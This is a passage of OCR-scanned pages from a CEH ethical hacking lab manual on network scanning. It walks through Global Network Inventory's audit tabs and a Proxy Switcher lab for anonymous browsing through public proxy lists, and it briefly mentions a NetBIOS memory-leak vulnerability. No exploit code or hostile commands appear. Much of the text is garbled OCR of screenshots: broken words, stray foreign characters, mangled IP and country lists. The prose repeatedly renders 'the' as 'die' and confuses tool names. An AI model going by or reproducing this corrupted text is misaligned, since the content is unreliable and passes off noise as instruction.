  • 112. Module 03 - Scanning Networks aScan only items that you need by customizing scan elements 16. The Memory tab summarizes die memory in your scanned machine. £□ E-mail address - Specifies the e- mail address that people should use when sending e- mail to you at this account. The e- mail address must be in the format name(ftcompany— for example, someone@mycom pany.com 17. In die NetBIOS section, complete details can be viewed. Global Network Inventory - Unregistered F ie V ie w Scan Tools R eports h e lp * • ‫ח‬ H e V iB lB & lm lH F i- iii ® - ‫-•:!־־־‬ •> Network a d ^ c n ! Q 1 ‫ו׳*חוח‬0‫י»ת‬ | ' j ber/1r*c ■t• ‫־‬5 ‫׳‬ Startup | K %- tk # n or Memoryf l w f « ■» M »0 coofirokn L . Mentors | g j Logical daks t M Oak ±n >#H iff) Operating ‫׳,ל‬d-• ‫״‬‫ן‬ ‫י‬ y -. ‫־‬‫־‬■‫־‬■• ct encct f H ‫׳‬11 ‫■•יי‬fff D*Ye*t [#] NmBIOS | Shw*1 p Uttramu a Tc<alPh3^cdven>0f/.M3 - Salable H-yrea... Total vfcuaL. ~ A v a to e V rtja ... »• lo ta ...-- &valabl&.. ‫»י‬ d[D V.CRt5F0UP[CrMJN'=]J Hcsr Marre 3 9 ^ ^ ‫־‬MF5HL9E4 (C0U!iT=1) J ‫־‬ hrescnp V22J20123:36-38 PM (COUNT‫־‬ ) | 3317 7 o b i 1 its u ;1 view retuR* ▼ a x ** s«a □ ‫מ‬ « N am * H % All eddresse* 4 # WOWCROUP ‫־‬■*w p y ‫־‬ ;h I0.C.0.4 (WIN-ULY8... O iip la /ed group: All groupsResults history depth: Last scan fo i each address FIGURE 11.15: Global Network Inventory Memorytab ‫ז‬x‫־‬ ' ° '1Global Network Inventory ‫־‬ Unregistered ^ k . j i j ‫״‬ . ■rr- q .7: ■> fid. . • ‫־‬‫ד‬^ Por. -annccfcrc Q System dots Hct fixes £ Scaabr e a te r 3" Startup ■ Desktop Derive* 2 MdBIOS ^ Shares .s r jx x p s )£• 1555 | ^ Lccocd or P Poeewots Mar ?pad Merer? >*‫י‬ Memory donees J^ Opcra.i-10 Cvs.or Q fc l ‫׳‬cut f i t v ie w 5tan Tools R eport( H elp 1^ ‫־‬‫ז‬ S J1 '’‫־‬□ E T? |5 |□ icwresufts ‫׳יי‬ X Ssa^aumanr ‫ו‬1*011 Q 'tp lt/« d group: All grouptRetjttt hutory depth: Latt to n for tacft aflcret; * 89 £ □ J5 Narrc _ H * P All ad d resses B 5 ‫־‬ WORKGROUP •»|1a616T(w’1^039.7''' { ■ 10.0.1‫>נ*ר‬VIN-IJI Y8... »U»d/ FIGURE 11.14: Global Network Inventory Bios summary tab Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 195
  • 113. Module 03 - Scanning Networks M essage subject - Type the Subject of your message. Global Network Inventory cannot post a message that does not contain a subject FIGURE 11:16: Global Network Inventory NetBIOS tab 18. The User Groups tab shows user account details with die work group. □ Name - Specifies the friendly name associated with your e-mail address. When you send m essages, this name appears in the From box of your outgoing m essages 19. The Logged on tab shows detailed logged on details of die machine. ‫ם‬1‫־‬IG'obel Network Inventory ‫־‬ Unregistered Fie View Scan Tools Reports Help 1□ c V |B p |g |m | a M em ?y ‫מ‬ Memory cfcvccs ‫■י‬P rrtc o •> N e tte d ‫־‬. E l !nvronmcrrt cr j• Startup ■ Deaktoo A - _bera I, Lojj=d or 2 C o n ju ta s rrf— Q P^cc350ra |^ M a r board I^J) »‫־‬ccc • I ‫־‬ : k Vent‫רה‬ Locicoldbks ^ D9sdr>c* m #> CIO‫כ‬ j j ] Opcralinq Cyslcrr Q 7 ‫י‬ Q ij0 «• ^ D evicc: It#] Net Cl DC ^ Shares | J ? -b w g rx x » H o s tN c n e ‫/־‬ / * -D39-4R5HL9E4(COUNT-51 z i ' rre sc a n p : E /2 2 '20 1 2 3:36:38 FM ( COUN5- ‫ל‬] G io u j £<*ar>sfrafo:(C0UNT=1) ‫■׳י‬‫!׳‬ S 0 CEN R 5HL3E4'>Adrim$tratoi U5cr occcu rt z i C r^ JD : C K ttK ite d COM Usets (COUN I - 1 1 v /lsC 2 S N R 5 H _ 3 E 4 A d f1 i‫״‬ istj<)(01 U ;et accourt _ J Gr»^ o: Guc:»; C O U N T-1) Jk• u A N 0 3 E M R 5 H L 9 E 4 G u tsl U :* f « ccou rt dC10*.IIS JU S fiS COUNT■!) % NT >‫־‬ FlZcV ^ cpcrlSc«vor VV«# k rc v ‫׳‬ n gtcup oooounl z i G r a if p M ta v u re * 1rg U ttrt(C Q I J N T ■1) T U 0 I5 i cn |i| S3 5) □ *3 $ Njit« * i* A ll a d d re ss•: - i f WORKGROUP ? S i i i l L »• i a i J i w N S : ‫׳‬ D splaycC group; All qioupaRcsuMts history depth: Last scan fo i each o o a e s !R sad / FIGURE 11.17: Global Network Inventory User groups section ; - ! o rGlobal Network Inventory ‫־‬ Unregistered F ie v ie w S o n Tools R eports Help !□is? iBiaiasp 5!■!a & » B Memcry ® a Memory devicec 4 • Scan 3 jm a r y ♦ S ) h itd te d « y t *sre C l n v m m g rt | ; & Services ‫ד‬ Port con rw ctrc C l Q f S * d r t / M ‫׳‬t« r Startup‫ל‬3."| ■ Desktop logged on zJ Hart l l i n * 0 33* | , ‫י‬‫׳‬ VF5H. =)E4 (COLNT=3) T r^rtartp 8/22V2012 3:3ft 38 FM (COUNT3‫־‬ ) * [W K -0 3 9 M R o - LSE4<C>tt>> L m qj? W oik statcr Service X W K C •SM R^rLSE4<0x2O5‫־‬ L n q u e F ie Server Service 3 WORKGROUP <0x00> Group Domain Name T o id 3 i.e n ld t»<pt»/ed group: A ll grou psRemits history depth H it scan ret earh naorett v * y* results N a1r « - &I addresses H - f i ‫־‬ W O R K G R O U P 1C.0.C.’ (WIN-D39... 19 10^f^U L Y «:: Rea fly Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 196
  • 114. Module 03 - Scanning Networks & Port ‫־‬ Specifies the port number you connect to on your outgoing e- mail (SMTP) server. This port number is usually 2 5 . 20. Tlie Port connectors section shows ports connected in die network. O utgoing mail (SM TP) ‫־‬ Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages 21. Tlie Service section give die details of die services installed in die machine. Globa' Network Inventory - UnregisteredS T Scan T oolt R eport( H elpF ile 1S 1 Users | Logged on may Memory devotes : -t‫־‬KC1: •£‫־‬‫׳‬ Network 0d3?1cr: Q fcrvronment | S « m :« a Startup ■1 Desktop NetBIOS £ 91‫־‬ares Ji> LSe n Fiocessois ^ L . l-b n tc rj £ L og cal disks D: * WOS | S ) 0p«1fcrg Syren• ‫—ן‬ J O ^ hrr ‫י‬ ;can currrjr, P« t connectors D o r ia n . V /D ^ K O R O U ? (C0UNT=25I J he*• H a r e : t*‫׳‬T . D39M R5HLJ3E4(CO U NT-25) J 1 ■‫״‬ * t t a r o : & '22/2D 12 3 3 6 3 8 PM (COUNT =26) ‫כו׳ן‬‫כ‬‫א‬’ Serai P o r 1S55CA C on p artle D 6 9 ‫.־‬Male ‫»ככ‬7‫ז‬ K e l o i d P011 F S /2 ‫כ‬ ‫נ‬»7‫ז‬ M oucc Pori F S /2 ’ 7 0 3 H USB a<r*51 bus t7 0 0 h USB ‫ווכ‬7 3‫י‬ UCD A cc0H .bu 4 , 7 0 3 H USB A coest.bu t ‫ז‬ alal 25 Atris Disj ayecl arouo; All aroupsFes jts nistory deptn: Last scan foi eatfi address view resut; w a x a ‫ש‬ b # Name H - AH addresses f r £* W O R K G R O U P ■»r10bn ‫־‬7‫־‬ ^N-big".'‫־‬.‫־‬ 0^10 ‫(.«־‬W‫׳‬fW‫׳‬N‫־‬ULY8"" FIGURE 11.19; Global Network Inventory Port connectors tab ‫״‬ ■ ‫״‬ ■1- 1Globa! Network Inventoiy ‫־‬ Unregistered M e v ie w 5<ar Tools R eports H elp § 3 - □Is ? H c 1 ® e / -•1a & ‫׳״‬ J ‫ב‬ ‫ג‬ ‫ו‬ a i d s y ie f i Q Processors £ Main beard ^ N e n o iy w Memory d e /c e s ^ L>j1d js v j Q Di:-•. J . £■ Net ■.. m Scan suran aiy ^ B C S |.§ ) O oefatro System l£ ‫)־‬ to ta le d software | ( | Environment Services | ‫?יי‬ Port c o m e d o s System slots | Hotfixes ^ S e a it ) eerier % 3 .< n : u ,_ _ H L _ 2 s 5 tlS B _ J C‫־־‬r ■^r . '* {3 0 S 2 ' Sha‫׳‬e& > U s e tu . Users | j> Logged o r J H o a N o k W H-033N R 5HL3£4 (C O U N T S 1 N T S ER V .C E >MsDisServerl 10 f H ” S E R V C E 'M S S Q L F D L o u n c h a f N ‫־‬ £ £ R V lC E VM S S Q L S E R V E R f N ‫־‬ S E R V C E 'M S S Q L S e r/e iO L A P S e iv ie e * , N ‫־‬ S E R V C E 'R e p o rtS c rv a 5 A H D39M REHL9E4A< inhatr‫*־‬or 38/22/12 09:01:20 Oowove^rou^lUroupsResults f r it pry dep th last ;can lo r te c h a d d rc n V « w re<uKs *2 » ‫־־‬‫י‬ □ m Nerrc _ E % A ll addresses S f W O R K G R O U P ;1abix7"(wi‫׳‬N-D3g... ;■ '1 6 0 .0 4 (W IN-ULY8... Ready FIGURE 11.18: Global Network Inventory Lowed on Section Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 197
  • 115. Module 03 - Scanning Networks R = rGloba! Network Inventory ‫־‬ Unregistered M e v ie w 5<ar Tools R eports H elp ® ‫י‬$*]‫ס‬‫ב‬-‫־‬ H e p H B ]® e| •-•Eg & ‫׳״‬ NetBOS D pf Devices et30S | Shares £ Usercroups Jsers | Loaaedor g Q C i Mainboard ^ Memory n Msrrcryde/ces Port cornedas Qf System slots | Hotfixes ^ Secut) center £ Startup ■ Desktoo | *i ' jjjj — »" M 1 • 3 0 .‫גי‬ c t iU Svtte‫״‬ ig ) 1 3 i i i ' i u n i c i l | Scrrisca | -N»♦ z i Domr* V»ORC13ROUP |CDUMI«l4/) _!J Hcs‫׳‬ *sLan^ '*1N 0‫»־‬IR5HL9E4(COUNT■!47| z i rr^ a n p 3/22!20H 3 3&38FM [COUNT =147) . Ldcte Acxbat Upcare Ser!/ce , £ p fteanon E>o=r1ence 41loma1‫׳‬c Manual RufMrg R um rg ‫:־־‬ 'Png-an Filei [vf‫־‬fc)Comrmn Fite'iAdobi C‫־‬vV.mdowtsystem32svehott eye •k netsv . Appicanon Host Helper Service Automatic R j'i'irg C «V.»Klowt^1stern32fivch0ftexe •k apph( ^Appfcanon Idenfctji tpflr9r»0nlnf1‫־‬rml1on Manual Manual Stepped R im rg C‫*־‬fcmdow1svstem32svc*10ft.exe •k Local C »V.m<tem(tsystern32svcf10fr.exe •k net?•/ rewau Service‫־‬5Apftlcanon Layer. Manual Stepped C ,V,mdowtS3i5tem32Ulg ew> Apffcarion Manafjenenr Manual Stepped C »v!n<kw?system32svcf10‫־‬tt exe •k nelw I0lal1< 7 toart :J Oowoye^KOu^lUroupsResults fcitory depth lost icon lor to<h address V ie w re<ufts *1 *9 2 □ m N e ir c _ E % A ll addresses S f W O R K G R O U P •1 ‫־‬ y 'a a ’7 iw i‘N -D 3 8 ’‫״‬" ’ ;■ '1 6 0 .0 4 (W IN-ULY8... Ready FIGURE 11J20: Global Network Inventory Services Section 22. The Network Adapters section shows die Adapter IP and Adapter type. S To create a new custom report that includes more than one scan elem ent, click choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, custom ize settings as desired, and click the OK button ‫־‬1Global Network Inventory ‫־‬ Unregistered Q ' l l & <‫׳״‬ Reports Help □ e v Fie view Stan Tools I* ‫״‬ ^ D c * c c a [#J NetBIOS | ^ SK3X3 4■ U3cr<rouF3 JL• Uaera ^ Looocdon j| Conputer ‫ו*€>־ת‬ Q Prooeaaora Mom boane f j j Memory B?1 Memory devices y Pc‫׳‬ t c o r r c c to o Q System alota |^ H otfxca ^ Ccc^rfy eerier j * Startup |^ Deoksop H Scan s jrrrc rv ^ 8 0 S |‫׳‬jgj] O porstrg Syrtom h w Utod t cftvm o B Envtronmoat | ‫״‬j , S o rv cm h■ v®00 1- ?‫מ‬ | v |Etherrct QIC|N0 - Tinettarp:£/^2336:333 2 ‫־‬FM (COUNT-11 n ^ ^ v V ^ E t ,.|D 4 : B E :D 9 :C |1 0 0 .D 7 l2S2S .2g|1D C .01 [vicreolt Iotall 1enlj V c w r c s u R ; ▼ ‫ל‬ X r-l ^ □ E $ Narre B 1^‫י‬ All addr*<«#< y ~ * £ W O R K G R O U P ■- m o ‫״‬M ( w n ' u’l ^ " ." ’ ^jjjte^e^roup^lU^oup^^esujt^jjto^jepth^as^a^o^scj^ddrts^Rea^ & A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory u ses a blank password FIGURE 11.21: Global Network Inventory Network Adapter tab Lab Analysis Document all die IP addresses, open ports and miming applications, and protocols you discovered during die lab. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 198
  • 116. Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP Scan Range: 10.0.0.1 —10.0.0.50 Scanned IP Address: 10.0.0.7,10.0.0.4 Result: ■ Scan summary Global Netw ork ■ Bios Inventory ■ Memory ■ NetBIOS ■ UserGroup ■ Logged On ■ Port connector ■ Services ■ Network Adapter P L E A S E T A L K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how? 2. How can you export the Global Network agent to a shared network directory? Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 199
  • 117. Module 03 - Scanning Networks Anonymous Browsing using Proxy Switcher Proxy Switcherallowsyou to automatically executeactions; basedon the detected netnork connection. Lab Scenario 111 the previous lab, you gathered information like scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory. NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. Vulnerability lias been identified in Microsoft Windows, which involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, the attacker can find a computer’s IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer’s memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included. As an expert penetration tester, you should follow typical security practices, to block such Internet-based attacks block the port 137 User Datagram Protocol (UDP) at the firewall. You must also understand how networks are scanned using Proxy Switcher. Lab Objectives This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to: ■ Hide your IP address from the websites you visit ■ Proxy server switching for improved anonymous surfing I C O N K E Y p=7 Valuable information Test your knowledge w Web exercise Q Workbook review Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 200
  • 118. Module 03 - Scanning Networks Lab Environment To cany out the lab, you need: ■ Proxy Switcher is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Switcher ■ You can also download the latest version o f Proxy Workbench from this link http:/ / www.proxyswitcher.com/ ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows Server 2012 ■ A web browser with Internet access ■ Follow’Wizard-driven installation steps to install Proxy Switcher ■ Administrative privileges to run tools Lab Duration Time: 15 Minutes Overview of Proxy Switcher Proxy Switcher allows you to automatically execute actions, based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example, setting proxy settings for Internet Explorer, Firefox, and Opera. Lab Tasks 1. Install Proxy Workbench in Windows Server 2012 (Host Machine) 2. Proxy Switcher is located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksProxy ToolsProxy Sw itcher 3. Follow’ the wizard-driven installation steps and install it in all platforms of the W indows operating system . 4. This lab will work in the CEH lab environment - on W indows Server 2012, W indows Server 2008, and W indows 7 5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in die menu bar. 2 " Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks Cl Automatic change of proxy configurations (or any other action) based on network information Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 201
  • 119. Module 03 - Scanning Networks G o ogle M o iillo Firefox fi *e •!1• -■cc9u Docum ents Calendar M ote • Sign n colt| HtJp Qownloatfs CW-I moderns cm *v‫*«״‬A S<* UpS^K. Web Developer Page Info Cle«r Recent Ustsr. 01+“ Sh1ft*IW ♦You Search Images Google Gocgle Search I'm feeling Lucky •Google Aboul Google Google comA6.««t>11ng P iogam m ei Business SolUion* P iracy t Te FIGURE 121: Firefox options tab 6. Go to die Advanced profile in die Options wizard of Firefox, and select Network tab, and dien click Settings. Options &‫ם‬ ‫י‬ § % p * k 3 G e n e ra l T a b s C o n te n t A p p lic a tio n s P riv a c y S e c u rity S>nc A d v a n c e d | S g t n g i . C le a r N o w C le a r N o v/ Exceptions.. G e n e ra l | M etw orV j U p d a te | E n c ry p tio n j C o n n e c tio n C o n fig u r e h o w h r e f o i c o n n e c ts t o th e Intern et C a c h e d W e b C o n te n t Y o u r v re b c o n te n t c a c h e 5 ‫י‬c u rre n tly u sin g 8 .7 M B o f d is k sp a c e I I O v e rrid e a u to m a t e c a c h e m a n a g e m e n t Limit cache to | 1024-9] MB of space O fflin e W e b C o n te n t a n d U se r D ata Y o u 1 a p p lic a tio n c a c h e is c j ir e n t l/ u s in g 0 b y te s 01 d is k s p a c e M T ell m e w h e n a w efccite aclrt t o s to re H at* fo r o fflin e u ce T h e fo llo v /in g tv e b site s a re a lo w e d t o s to re data fo r o fflin e u s e Bar eve.. H e lpC a n c e lO K FIGURE 122 Firefox Network Settings 7. Select die Use System proxy settings radio button, and click OK. C3Often different internet connections require com pletely different proxy server settings and it's a real pain to change them manually 3‫׳‬k Proxy Switcher fully compatible with Internet Explorer, Firefox, Opera and other programs Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 202
  • 120. Module 03 - Scanning Networks ‫־‬ ‫י‬ ‫י‬ ‫י‬Connection Settings Configure Poxies to Access the Internet O No prox^ '‫)־‬ Auto-detect proxy settings for this network (•) Use system proxy settings Manual proxy configuration: HTTP 5rojjy: 127.0.0.1 @ Uje this prcxy server for all protocols Pfirt Port Port SSLVoxy: 127.0.0.1 FTP *roxy. 127.0.0.1 SOCKS H ost 127.0.0.1 O SOCKS v4 ® SOCKS v5 No Pro>y fo r localhcst, 127.0.0.1 Reload Example: .mozilla.org, .net.nz, 192.168.1.0/24 O Automatic proxy configuration URL: HelpCancelOK fi proxy switcher supports following command line options: -d: Activate direct connection FIGURE 12.3: Firefox Connection Settings 8. Now to Install Proxy Switcher Standard, follow the wizard-driven installation steps. 9. To launch Proxy Switcher Standard, go to Start menu by hovering die mouse cursor in die lower-left corner of the desktop. FIGURE 124: WmdcKvs Server 2012 - Desktop view 10. Click die Proxy Switcher Standard app to open die Proxy Switcher window. OR T A S K 1 Proxy Servers Downloading Click Proxy Switcher from die Tray Icon list. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 203
  • 121. Module 03 - Scanning Networks Start Administrator^ Server W indows G oogle Hyper-V Global M anager Powershell Chrom e M anager Network Inventory Fs b W * 91 SI C om puter Control Hyper-V Panel Machine... Centof... y v 9 K . Com m and M021I* PKKVSw* Prom pt Frefox vrr <0 *£«p«- * Proxy Checker CM*up ,‫י‬ .‫ר‬► FIGURE 125: Windows Server 2012 - Apps s Server. at* o Customize... jate Datacenter A / Q t— 1 l A r - r ‫׳‬1‫״‬ / ! ^Dp^uild 8400 FIGURE 126: Select Proxy Switcher 11. The Proxy List Wizard will appear as shown in die following figure; click Next Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited £□ Proxy Switcher is free to use without limitations for personal and commercial use ‫ם‬ if the server becomes inaccessible Proxy Switcher will try to find working proxy server ‫־‬ a reddish background will be displayed till a working proxy server is found. C E H Lab M anual Page 204
  • 122. Module 03 - Scanning Networks £3‫־‬ Proxy Switcher ssupports for LAN, dialup, VPN and other RAS connections 12. Select die Find New Server, Rescan Server, Recheck Dead radio button fiom Common Task, and click Finish. & ‫־‬ Proxy switching from command line (can be used at logon to automatically set connection settings). 13. A list of downloaded proxy servers will show in die left panel. Proxy List Wizard Uang this wizard you can qc*ckly complete common proxy lot managment tasks Cick finish to continue. Common Tasks (•) find New Servers. Rescan Servers. Recheck Dead O Find 100 New Proxy Servers O find New Proxy Severs Located in a Specific Country O Rescan Working and Anonymous Proxy Servers CanedFinish< Back0 Show Wizard on Startup FIGURE 12.8: Select common tasks Proxy List Wizard Welcome to the Proxy Switcher Using this wizard you can quickly complete common proxy list managment tasks. To continue, dick Next CanedNext >@ Show Wizard on Startup <Back FIGURE 127: Proxy List wizard Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 205
  • 123. Module 03 - Scanning Networks I MProxy Switcher Unregistered ( Direct Connection ] F ile E d it A c t io n s V ie w H e lp ‫א‬Filer Proxy Servers A Roxy Scanner Serve* State ResDDnte Countiy * N e w (683) ,? 93.151.160.1971080 Testira 17082ns H RJSSIAN FEDERATION B ‫&־‬ high Aronymsus (0) £ 93.151.180.195:1080 Teetirg 17035n« m a RJSSIAN FEDERATION SSL (0) 93.150.9.381C80 Testing 15631ns RJSSIAN FEDERATION £ : Brte(O) tu1rd-113-68 vprtage.com Lhtested i ‫מ‬ Dead (2871) , f 93 126.111213:80 Lhtested * UNITED STATES 2 Permanently (656?) £ 95.170.181 121 8080 Lht*ct*d m a RJSSIAN FEDERATION 1— Book. Anonymity (301) <? 95.159 368 ‫ו‬C Lhtested “ SYR;AM ARAD REPUBLIC ‫־‬£5-—‫ן‬ Pnva!e (15) 95.159.31.31:80 Lhtested — b‫׳‬ KAfJ AHAB KtPUBLIC V t t Dangerous (597) 95.159 3M 480 Lhtested “ SYRIAN ARAB REPUBLIC f~‫־‬& My P‫“׳‬ V Server• (0) , f 94.59.260 71:8118 Lhtoetod ^ 5 UNITED ARAB EMIRATES :— PnwcySwitchcr (0) * - .............. __ L>!tested___ C UNITED ARB EMIRATES Caned Fbu‫»׳‬d 1500 MZ3 28 kb ProgressState Conpbte Conpfcte S tefre Core PrcxyNet wviwaliveproxy.com mw.cyberayndrome.net‫״‬ <w!wnrtime.com DL & FIGURE 129: List of downloadeed Prosy Server 14. To stop downloading die proxy server click L=Jg' x 1Proxy Switcher Unregistered ( Direct Connection ) File Edit Actions View Help «filer F ox/ Servers r Couriry J HONG KONG | ITALY »: REPUBLIC OF KOREA “ NETHERLANDS !ITALY ™ UNITED ARAB EMIRATES •: REPUBLICOF KOREA 5 SWEDEN “ SYRIAN ARAB REPUBLIC ” SYRIAN ARAB REPUBLIC — CZECH REPUBLIC Serve* Slate Resroroe £ 001 147 48 1€‫־‬ *»«twn«t (Aliv«-SSL) 13810nt £ 1 ‫ס‬‫י‬1‫ב‬»‫זז»,ג‬95‫־‬10‫ד־‬54-159‫<:י‬* (Alive-SSL) 106Nh* £ 218152.121 184:8080 (Alive-SSL) 12259ns £ 95.211.152.218:3128 (Alive-SSL) 11185ns £ 95.110.159.54:3080 (Alive-SSL) 13401ns £ 9156129 24 8)80 (Alive-SSL) 11&D2ns u>4gpj 1133aneunc co (Alive-SSL) 11610m pjf dsd»cr/2'20Jcvonfcrc com: (.*Jive-SSL) 15331ns 91.144.44.86:3128 (Alive-SSL) 11271ns £ 91.144.44.88:8080 (.Alive-SSL) 11259ns 92.62.225.13080:‫ר־‬ (Alive-SSL) 11977ns ‫־‬ Proxy Scanner ♦ N#w (?195) H y A ic n y m o u o (0) I••••©‫׳‬ SSL (0) | fc?Bte(0) B ~ # Dead (1857) =••••{2' Perm anently 16844] Basic Anonymity (162) | ^ Private (1) j--& Dangerous 696) h ‫־‬& My Proxy Servers (0J - 5 ‫}־‬‫׳‬ ProocySwtcher (0) Cancel V Keep Ali/e Auto Swtcf‫־‬DsajleJ 108.21.5969:18221 tested 09 (Deod) bccousc ccrreoon bmed out 2 ' 3.864.103.80 tested as [Deod] because connectionllrrcd 0U 123.30.188.46:2214 tested as [Dead] Decause ccnrecaon tuned out. 68 134253.197 5563tested as [Dead] because comection •jmedout. FIGURE 1210: Click on Start button 15. Click Basic Anonymity in die right panel; it shows a list of downloaded proxy servers. When Proxy Switcher is running in Keep-A.live mode it tries to maintain working proxy server connection by switching to different proxy server if current dies When active proxy server becomes inaccessible Proxy Switcher will pick different server from ProxySwitcher category If the active proxy server is currently a liv e the background will be green Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 206
  • 124. Module 03 - Scanning Networks | _ ; o ^Proxy Switcher Unregistered ( Direct Connection) KA L i 0■ 0 A 1!l) 2) =*° *‘ ‫׳‬,‫״‬ File Edit Actions View Help & s►□ x Ia a a g ? Proxy Scanner Server State RespxKe Countiy j~ # New (853) ,f 91 14444 65 3128 (Alve-SSU 10160ns — SvRAfi ARAB REPUBI B ‫&־‬ Aronyrroue (0) <f 119252.170.34:80.. (Aive-SSU 99/2rre INDONESIA h & SSL(0) ,f 114110*4.353128 (Alve-SSL) 10705ns ^ INDONESIA Bte(0) f 41 164.142.154:3123 (Alve-SSU 12035ns ►)E SOUTH AFRICA ■‫»־‬-& Dead (2872) 3128?10149101‫כי‬2f, Alve 11206ns m BRAZIL Femanently (6925) ,f 2D3 66 4* 28C Alvo 10635n• H iTAIV/AM ‫־"׳‬1"<<...‘'‫י‬■1513 ,f 203254 223 54 8080 (Alve-SSL) 11037ns REPUBLIC OF KOREA — Pnvale (16) <f 200253146.5 8080 Alve 10790ns pg BRAZIL j~ & Dancerous (696) <f 199231 211 1078080 (Alve-SSU 10974m 1■& My Proxy Sorvoro (0) ,f 1376315.61:3128 (Alve-SSU 10892m P 3 BRAZIL -■‫־‬ PraxySwltcher (0) if 136233.112.23128 (Alve-SSU 11115ns 1 ‫ס‬ BRAZIL < 1 ■1 Caned Keep Alive Auto S w t d ‫־‬Dsabled 17738.179.2680tested as [Alwej 17738.179.26:80tested as [(Aive-SSU] 119252.170.34:80tested a< (Alive] 119252.170.34.80 tested as [(Alive-SSL)] 33/32 ISilli&SSitSiSk FIGURE 1211: Selecting downloaded Proxy server from Basic Anonymity 16. Select one Proxy server IP address from right panel to swich die selected proxy server, and click die icon.fTJ flit a 13 Proxy Sw itcher U nregistered ( D irect C onnection ) 1 ~ l~a ! * F ile E d it ,A c t io n s V ie w H e lp O # ‫׳‬ □ n [ a a . a a i f j 2 y A Lis | ‫/י‬ | Proxy S«rvera |X j State Hesponte Lointiy (Alve-SSU 10159ms “ SYRIAN ARAB REPUBLIC (Alve-SSL 1315‫־‬m [ J HONG KONG (Alve-SSU ‫*״‬10154 1 | ITALY Alh/e 10436ns REPUBLIC OF IQOREA (Alve-SSU 13556ns ;-S W E D E N (Alve-SSL:• n123me 1 ITALY (Alve-SSU 10741ns (Alve-SSU 10233ns ----- NETHERLANDS (Alve-SSU 10955ns REPUBLIC OF KOREA (Alve-SSL) 11251m “ HUNGARY (Alve-SSU 10931ns ^ ^ IRAfl (AlveSSU 15810ns S3£5 KENYA (Alve-SSU 10154ns “ SYRIAN ARAB REPUBLIC Server 91.14444.65:3123,f f 001.147.48.1 U .c ta b c r c t., 95.aem ef.&‫־‬1‫ל‬‫־‬? ,lx>stS4 1 59 218.152.121.184:3030,f 95.110159.545080 3i.S6.2‫־‬S.2-i.S)SD.. if 95.21 1 15 2 .21 8 :3 12 3 f u 5 4 jp j1 1 3 5 a T T S jn o coJcr:• ,f 91.82.65.173:8080 < f 8 6 .1 1 1 1A 4 .T 9 4.3 1 23 89.130.23128.‫ד‬4$ 3123861 4 4 4 4‫ו‬9f, £ 5P x » y S can n er (766)New‫*ל‬•••J (0)*rtg h Anorrym ou <0)S S L& (0)01B1te‫־־‬; (2381)B Y Dead (6925)7 $P e m a n e n tly.... '467)Basic Anonym ity (116ate‫׳‬Pn‫־‬ &h !‫׳‬696)Dangerous‫־‬ ‫־‬ &j (0)Proxy Ser/ere‫־‬ &r (0)ProxySvtttcher—: Ctaeblcd [[ Koep Alive ][ Auto S w tc h | h ‫׳‬ 218 152. 121.I84:8030tested as ((Alve-SSL:] 218.152.121.144:8030 tested as [Alive] ha*»54-159-l 10-95 s e n ie rie d ie a ti a m b a « 8 0 8 0 te 4 » d » (‫׳‬ A lv e-S S L )] 031 .1 4 7.4 8 .1 1 6 .w atb.n et/ig3tor.com :3123 teatsd 0 5 [(ASve SSL)) FIGURE 1212 Selecting the proxy server 17. The selected proxy server will connect, and it will show die following connection icon. £z‫־‬ When running in Auto Switch mode Proxy Switcher will switch active proxy servers regularly. Switching period can be set with a slider from 5 minutes to 10 seconds ^ In addition to standard add/remove/edit functions proxy manager contains functions useful for anonymous surfing and proxy availability testing Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 207
